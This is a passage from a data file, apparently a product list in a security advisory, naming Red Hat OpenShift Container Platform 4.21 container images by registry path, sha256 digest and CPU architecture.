"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
